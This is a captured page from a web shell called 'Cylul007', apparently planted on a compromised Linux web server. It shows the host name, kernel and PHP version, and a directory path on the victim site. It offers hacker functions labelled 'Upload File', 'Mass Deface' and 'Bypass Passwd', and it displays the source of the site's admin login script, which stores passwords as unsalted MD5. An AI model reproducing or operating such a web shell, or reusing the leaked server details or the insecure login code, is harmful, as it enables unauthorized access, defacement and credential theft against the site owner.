Cylul007 Webshell
Server :
Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
php :
8.0.30
on
cgi-fcgi
Time
25 Nov 2024 21:51:11
Current Directory :
/
home
/
amvm
/
www
/
dhindsa
/
back
/
myadmin
/
Upload File :
Mass Deface
Home
Bypass Passwd
Current File : /home/amvm/www/dhindsa/back/myadmin/log.php
<?php include('config.php');//session_start();if (!isset($_SESSION['users_id'])) {if($_SERVER['REQUEST_METHOD'] == "POST"){ //Username and Password sent from Form $username = mysqli_real_escape_string($mysql_con, $_POST['user']); $password = mysqli_real_escape_string($mysql_con, $_POST['pass']); $password = md5($password); $sql = "SELECT * FROM users WHERE username ='$username' AND password ='$password'"; $query = mysqli_query($mysql_con, $sql); $res=mysqli_num_rows($query); //If result match $username and $password Table row must be 1 row if($res == 1) { $_SESSION['username'] = $username; $_SESSION['password'] = $password ; $_SESSION['login'] = true; header("Location: index.php"); } else { echo "Invalid Username or Password"; }} }?><!doctype html><html><head><meta charset="UTF-8"><title>Admin Login</title></head><body><h1>Login</h1><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"><label>Username</label><input type="text" name="user"><br/><br/><label>Password</label><input type="password" name="pass"><br/><br/><input type="submit" name="submit" value="Login"><br/></form></body></html>
./LuLlaby007 ♥ Tata Cantik - Copyright 2k18